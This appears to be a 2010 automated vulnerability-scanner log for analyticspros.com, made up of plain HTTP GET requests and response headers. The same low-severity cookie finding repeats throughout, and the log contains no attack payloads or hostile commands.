GET /component/jsetup/comment/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:02:53 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:02:56 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:02:56 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 94084
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /component/jsetup/comment/add.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:33:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:33:40 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:33:40 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26076
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /component/jsetup/comment/function.mysql-connect HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/component/jsetup/comment/add.html?commenttype=20&etid=90&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY2Jml0ZW1pZD03MCZmb3JtYXQ9aHRtbCZpZD05MDphbmFseXRpY3MtdG9vbGJhciZ2aWV3PWFydGljbGUmbGF5b3V0PWRlZmF1bHQmY29tbWVudHR5cGU9MjA%3D Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 08:07:03 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:07:06 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:07:06 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16573
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:48:23 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:48:26 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:48:27 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30545
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.php HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:33:11 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:33:12 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:33:12 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30531
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products/63-urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/products/63-urchin/119-urchin-6.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:25:07 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:25:07 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:25:07 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23022
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products/63-urchin/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:23:12 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:23:14 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:23:14 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22916
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products/63-urchin/119-urchin-6.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 00:25:25 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 00:25:26 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 00:25:26 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22914
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products/63-urchin/120-buy-urchin-7-or-upgrade.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:33:22 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:33:23 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:33:23 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30535
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products/63-urchin/70-urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:18:33 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 03:18:37 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 03:18:37 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25092
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products/63-urchin/85-urchin-hosted.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:33:27 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:33:29 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:33:29 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products/64-data-warehouse/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:59:57 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:59:59 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:59:59 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19551
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products/64-data-warehouse/84-analytics-data-warehouse.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:21:20 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 03:21:24 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 03:21:24 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25522
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products/65-ae.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/products/65-ae/110-analytics-engine.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:26:02 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:26:05 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:26:05 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19739
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products/65-ae/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:23:47 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:23:49 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:23:49 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
